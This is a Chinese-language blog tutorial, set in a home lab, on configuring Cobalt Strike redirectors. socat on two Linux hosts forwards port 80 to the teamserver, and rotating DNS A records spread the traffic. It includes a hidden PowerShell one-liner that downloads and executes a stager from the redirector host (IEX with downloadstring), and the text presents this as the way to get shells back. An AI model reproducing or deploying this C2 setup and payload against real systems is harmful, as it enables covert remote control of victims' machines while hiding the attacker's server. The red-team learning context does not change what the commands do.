【远控使用】Cobalt Strike使用重定器

| | | | 331

前言

  • Cobalt Strike基本学习

目标

image-20210901154227983

Cobalt Stike重定向

image-20210831105934755

接着下一步,就是让r1-r3这三台linux主机重定向到我们的teamserver中,可以使用socat来做

DNS系统域名 dj.com

teamserver team.dj.com 192.168.1.105

ubuntu1 r1.dj.com 192.168.1.107

ubuntu2 r2.dj.com 192.168.1.108

这回我们就不要r3了,我电脑运行太多虚拟机会卡

接着就可以用这个定义的A记录域名,直接上cs

image-20210831111049390

这里就要用到socat来进行重定向

工具socat(一款端口重定向工具)我们用它来建立80端口上的连接管理,并且继续在80端口运行那个连接团队服务器的连接。

1
socat TCP4-LISTEN:80,fork TCP4:team.dj.com:80

直接用apt安装socat

1
apt-get install socat

接着r1,r2执行这个命令,如果端口被占用可以关掉服务,我这边是关掉apache2

1
/etc/init.d/apache2 stop

image-20210831223456896

打开cs,创建一个监听窗口,让他访问我们的第一个A地址解析的r1

image-20210901154530913

设置我们所有A记录被轮流访问

image-20210901155233076

1
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://r1.dj.com:80/a'))"

image-20210901053743593

接着就能实现每个A轮流返回powershell

image-20210901204359074

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【远控使用】Cobalt Strike使用重定器

文章作者:孤桜懶契

发布时间:2021年08月31日 - 21:25:10

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/121.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------
欢迎光临
❤️
孤桜懶契
请多关照
❤️
❤️